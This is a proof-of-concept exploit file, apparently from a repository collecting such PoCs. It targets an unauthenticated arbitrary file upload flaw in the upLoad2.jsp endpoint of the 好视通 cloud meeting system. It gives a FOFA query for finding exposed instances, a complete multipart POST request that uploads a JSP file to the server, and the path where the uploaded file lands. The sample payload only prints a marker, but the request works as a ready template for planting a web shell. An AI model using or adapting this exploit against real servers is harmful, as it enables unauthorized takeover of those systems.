POC/wpoc/好视通视频会议系统/好视通云会议upLoad2.jsp接口处存在任意文件上传漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

28 lines
706 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 好视通云会议upLoad2.jsp接口处存在任意文件上传漏洞
好视通云会议/fm/systemConfig/upLoad2.jsp接口处存在任意文件上传漏洞未经身份认证的攻击者可以通过此漏洞上传恶意后门文件最终可获取服务器权限。
## fofa
```javascript
app:"好视通-云会议"
```
## poc
```javascript
POST /fm/systemConfig/upLoad2.jsp HTTP/1.1
Content-Type: multipart/form-data; boundary=1515df1sdfdsfddfs
Accept-Encoding: gzip
--1515df1sdfdsfddfs
Content-Disposition: form-data; name="file"; filename="dudesuite.jsp"
Content-Type: application/octet-stream
<% out.print("dudesuite"); %>
--1515df1sdfdsfddfs--
```
文件路径`/fm/upload/dudesuite.jsp`